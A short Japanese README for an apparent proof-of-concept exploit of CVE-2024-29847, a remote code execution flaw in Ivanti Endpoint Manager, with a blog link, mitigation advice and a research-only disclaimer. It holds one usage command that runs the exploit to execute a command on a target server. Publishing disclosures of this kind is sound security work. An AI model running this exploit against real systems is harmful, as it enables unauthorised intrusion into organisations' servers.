
CVE-2024-29847 のエクスプロイト
Ivanti Endpoint Manager AgentPortal の信頼できないデータのデシリアライゼーションによるリモートコード実行脆弱性 (CVE-2024-29847) の PoC
この脆弱性の根本原因分析は私のブログでご覧いただけます:
https://summoning.team/blog/ivanti-epm-CVE-2024-29847-deserialization-RCE/
CVE-2024-29847.exe --uselease --installdir "C:\Program Files\LANDesk\ManagementSuite\LANDesk\ManagementSuite\Core\Core.Webservices" tcp://192.168.0.200:49669/LDSM exec test
最新バージョンにアップデートするか、以下のリンクに従って緩和してください
本ソフトウェアは、学術研究および効果的な防御手法の開発を目的として作成されたものであり、明示的に許可された場合を除き、システムへの攻撃に使用することを意図していません。プロジェクトメンテナは、ソフトウェアの誤用について一切の責任を負いません。責任を持ってご使用ください。